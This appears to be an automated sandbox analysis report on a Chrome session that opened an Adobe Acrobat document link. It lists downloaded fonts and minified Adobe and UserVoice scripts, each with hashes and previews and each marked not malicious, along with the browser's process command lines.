                                                      Preview:wOF2OTTO...$.......l.............................F...+?DYNA.i?GDYN.Q..L.`..P...6.$..@...... .r...H.... ..CDQ.."1..UUU.&.w... .._..w..._..........7......e.*...#.1......7...@..=..f9.N...0..3..J)...hTM.#.Zg.Ii.@..IC8lO4...cR0.lf.I.W..xZ.'..;..r\Jv....E-...V..A4.[..`-&AKPi.."...R3.....p..Gi.9V..m..>.f_\..D..I.$-..a.../?.m>...;GX.......=..b...b,..*b..*...\.m.vPQ..^...R.b..D.............I..~23....2.L..JJj0vL.)L..._......0..q.o7.r.N9.]cMR.h...S..(".0e..]...._.U..r..O...i.{..U.....pi.t@%...T..j...4.}..i.....a.a..P.........T81.TL..tY.R...^...1.._.g..5..K....P/Y.,.s=3..#.....U.o........G..@......#..0.(.4. .49..~..n...B....~.....0..?.[..v..;..F.*3....B...(.ZG..c....j...1'C....i...2.h.g.^.O...f."9.r..a.gv..Z..{.:.....".m....=Cg.....5.j2......N..Q..T3..N..........p.7..q,."8;. .E.ai..F.j.......B..{t...>z..}.....G...I..vq^..t......k..E$.~.k.h.&...~h.........!.Y(@9t....L.\,.J..6..!..9\.m..C<G3^..>.;...ySk.D=i......8J..*.*.!.....M.h%m......L...=.W.L...}._L.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (34880)
                                                      Category:downloaded
                                                      Size (bytes):73001
                                                      Entropy (8bit):5.440024061630501
                                                      Encrypted:false
                                                      SSDEEP:1536:kdyPwmL36Mq59LGKEBJw2s9keLR85qGNyrbftmq0eRuVZBC/8WHqaQ70CHZKum+N:kdy4mC9syrbfqeRsrCVXuKum8wdpdFY
                                                      MD5:CA62CADF703379BEC1CCA8E111708C93
                                                      SHA1:B2EA13E3FC63321EEE0D4F7302047D98F5AF5209
                                                      SHA-256:96AF755E03242F4541B2B0A23E68DE7DB583A6D1C9C6BDF2E7474351FE34FF11
                                                      SHA-512:1EB12EB57BB562693A2A9C8165DA8809E53C0132FD7A945E1B7F67992A1E080307A1BC8AF7D00555968131E6C038D685836B43EBAB6394CEB214F9322ECBF745
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://widget.uservoice.com/6gNXXegDB6rtHARrNKRF8w
                                                      Preview:window.UserVoice = {events:window.UserVoice||[],push:function(x){window.UserVoice.events.push(x)},account:{"active_widgets":[],"campaign":"footer_poweredby","name":"Adobe","white_labeled":false,"widget2_domain":"acrobat.uservoice.com","subdomain_ssl_host":"acrobat.uservoice.com","subdomain_site_host":"acrobat.uservoice.com","subdomain_key":"acrobat","subdomain_id":496015,"client_key":"6gNXXegDB6rtHARrNKRF8w","client_options":null,"satisfaction_autoprompt_enabled":false,"messages":{"Loading":"Loading","OpenContactWidget":"Open Contact Widget","OpenFeedbackWidget":"Open Feedback Widget"},"has_ticketing_system":false,"has_feedback_system":true,"has_satisfaction":false,"private_site_enabled":false,"source_version":1741282970,"deactivated":false},client_widgets:{},manifest:{"tab-left-dark-no-bullhorn":"/pkg/clients/widget2/tab-left-dark-no-bullhorn-9669fb4a9d79416e9dc17618c9ed226faf8171ce461449f1282d6fcc2d6aa338.png","tab-left-light-no-bullhorn":"/pkg/clients/widget2/tab-left-light-no-bullh
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (8882)
                                                      Category:downloaded
                                                      Size (bytes):8933
                                                      Entropy (8bit):5.293642365703702
                                                      Encrypted:false
                                                      SSDEEP:192:1bcqIvMHD+10tB9IUtyyzRH0IXxg8xk8IkRPxjx+TbhSbjabMW4Vyye5Rsul3fT:2a6iyWzV7gofTP3+bhSbjabMzUXPsGr
                                                      MD5:6D9ACE390341E9591FA7D218CB43D5A1
                                                      SHA1:2FFF6EEC6684A2CBFD693571DFEB4BDF96573D39
                                                      SHA-256:33CCA8D8F77E869756DE75A852229DEEABC2181005516C217121275C21250368
                                                      SHA-512:38287A0006A490DF3E02B5BE8CEAF74A76F2A60513EF2ABD23609ED36F6BCF58139F205C7DE118FFACD005DDDC003B668CF2080E7ED3CB0F5C155A65F29B5D54
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/web-access-api.js
                                                      Preview:"use strict";(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[374],{eidH:(e,t,r)=>{r.r(t),r.d(t,{default:()=>DCWebAccessAPI});var s=r("plsW"),i=r("4wyi");function ownKeys(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var s=Object.getOwnPropertySymbols(e);t&&(s=s.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,s)}return r}function _objectSpread(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?ownKeys(Object(r),!0).forEach((function(t){_defineProperty(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):ownKeys(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}function _defineProperty(e,t,r){return(t=function _toPropertyKey(e){var t=function _toPrimitive(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var s=r.call(e,t||"d
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (29141)
                                                      Category:downloaded
                                                      Size (bytes):29199
                                                      Entropy (8bit):5.376056686399917
                                                      Encrypted:false
                                                      SSDEEP:768:P2ezkqe6Vxu2y0hfxEAqbfSXfoQzF7aaJcdQ/dUrjxQkP/JBHe48I09qln:zVdz43TkQ
                                                      MD5:B3387221F539A3DBE2406E086A1C338D
                                                      SHA1:231DE1232836BBDF0920322D11C83E621B05D9C9
                                                      SHA-256:24C1180896B469E3FCBB73B77786B944AFDD7A12D6907B2D99AA807B81900012
                                                      SHA-512:D1B72421983EA4499196276AAEF76D9E2F55D5F2A1DAB5F887ADA4591E55CFBEABB6DA16D9FBEB2554998136BEC9E7B625E1DFF194E02115D86106416C4B0FBD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/genAICoreAPIs-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[1431],{ZnEp:(e,t,n)=>{n.r(t),n.d(t,{default:()=>_});var i=n("plsW"),o=n("835Y"),s=n.n(o),__awaiter=function(e,t,n,i){return new(n||(n=Promise))((function(o,s){function fulfilled(e){try{step(i.next(e))}catch(e){s(e)}}function rejected(e){try{step(i.throw(e))}catch(e){s(e)}}function step(e){e.done?o(e.value):function adopt(e){return e instanceof n?e:new n((function(t){t(e)}))}(e.value).then(fulfilled,rejected)}step((i=i.apply(e,t||[])).next())}))};const createReadableStream=()=>{let e;return{chunkListener:t=>{var n;try{e.enqueue(t),"Completed"===(null===(n=null==t?void 0:t.end_of_stream)||void 0===n?void 0:n.status)&&e.close()}catch(t){e.error(t)}},onError:t=>{e.error(t)},response:new ReadableStream({start(t){return __awaiter(this,void 0,void 0,(function*(){try{e=t}catch(t){e.error(t)}}))}})}},evaluateCurrentFeatureLimits=function(e){let t=arguments.length>1&&void 0!==arguments[1]&&arguments[1];const{feature_
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (10366)
                                                      Category:downloaded
                                                      Size (bytes):10412
                                                      Entropy (8bit):5.406094135469951
                                                      Encrypted:false
                                                      SSDEEP:192:Y29NoL6XWJ6Xy2K2thg5rMmbRH8aayNQ/AtKz8XMZQD6x5oMKb3X:yL6XWAbg5rMmbRH8aayNQmSbZQDTMKjX
                                                      MD5:0B14B8F3730F1F75A0A1FD07138CA369
                                                      SHA1:933E0556EEC85768D5D877A3AC59579DF760BA0C
                                                      SHA-256:B8DF84EF1DB222E24A7824B05D830101B41119F14C47146810A807610EE14878
                                                      SHA-512:C648D294E3C12DE7C853CEB5C0D572680C231F52E4FE002B4246AADB81DE6AA2797A6BF1DAEF8E7FD7562EBAC2E5D1CA074C4C094F3AC8D0418C9FFB8F3B8E7A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.582.0/400-chunk.js
                                                      Preview:(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[400],{AXyZ:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function toString(){return this.map((function(t){var n=function cssWithMappingToString(e,t){var n=e[1]||"",r=e[3];if(!r)return n;if(t&&"function"==typeof btoa){var o=function toComment(e){var t=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),n="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(t);return"/*# ".concat(n," */")}(r),i=r.sources.map((function(e){return"/*# sourceURL=".concat(r.sourceRoot||"").concat(e," */")}));return[n].concat(i).concat([o]).join("\n")}return[n].join("\n")}(t,e);return t[2]?"@media ".concat(t[2]," {").concat(n,"}"):n})).join("")},t.i=function(e,n,r){"string"==typeof e&&(e=[[null,e,""]]);var o={};if(r)for(var i=0;i<this.length;i++){var a=this[i][0];null!=a&&(o[a]=!0)}for(var s=0;s<e.length;s++){var c=[].concat(e[s]);r&&o[c[0]]||(n&&(c[2]?c[2]="".concat(n," and ").concat(c[2]):c[2]=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65471)
                                                      Category:downloaded
                                                      Size (bytes):95176
                                                      Entropy (8bit):5.208849037179669
                                                      Encrypted:false
                                                      SSDEEP:1536:hyuxtnj+Atjp1CMojAzSGbaPs0VzM4Mse5+p4TRga/k2js8onV8RJvM+8:hyu1vCbkzdbaPs0VzM4Mse5+KTRgaM2A
                                                      MD5:A779FE24792BA607572C7E8A0757B46B
                                                      SHA1:48BB522274F89E1B4C58FEC9CFB91A726A17B284
                                                      SHA-256:73AD85D7C7C2F31169826DCD257C4AB299AD85894F54D3499313692985EDD12C
                                                      SHA-512:A02583F3E210333473A48852B55160F1E10EE944F4C96EE174DB97A2E52416E1BC421DF348795FEABE74C413C9ADABB6941E085AAA5CC089AF877A688A7F0475
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-core/3.70.1/dc-mobx.js
                                                      Preview:/*! For license information please see dc-mobx.js.LICENSE.txt */.(()=>{var e={SDwO:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"auth",{enumerable:!0,get:function(){return i.auth}}),Object.defineProperty(t,"locale",{enumerable:!0,get:function(){return a.locale}});var r,o=n("y986"),i=n("ewvR"),a=n("Ydhh"),s=(r=n("Z2FK"))&&r.__esModule?r:{default:r};(0,o.useStrict)(!0),window.adobe_dc_sdk.appLauncher.coreFunction().addProvider("asset",s.default.getInstance)},Z2FK:(e,t,n)=>{"use strict";function r(e){return r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}function o(e,t){for(var n=0;n<t.length;n++){var o=t[n];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,(void 0,i=function(e,t){if("object"!==r(e)||null===e)return e;var n=e[Symb
                                                      No static file info
                                                      No network behavior found
                                                      020406080s020406080100

                                                      Click to jump to process

                                                      020406080s0.0050100150MB

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:10:20:52
                                                      Start date:18/03/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                      Imagebase:0x7ff778810000
                                                      File size:3'388'000 bytes
                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:1
                                                      Start time:10:20:53
                                                      Start date:18/03/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1900,i,384991949693676811,3200866675304144503,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1932 /prefetch:3
                                                      Imagebase:0x7ff778810000
                                                      File size:3'388'000 bytes
                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:10:20:59
                                                      Start date:18/03/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://acrobat.adobe.com/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5"
                                                      Imagebase:0x7ff778810000
                                                      File size:3'388'000 bytes
                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      No disassembly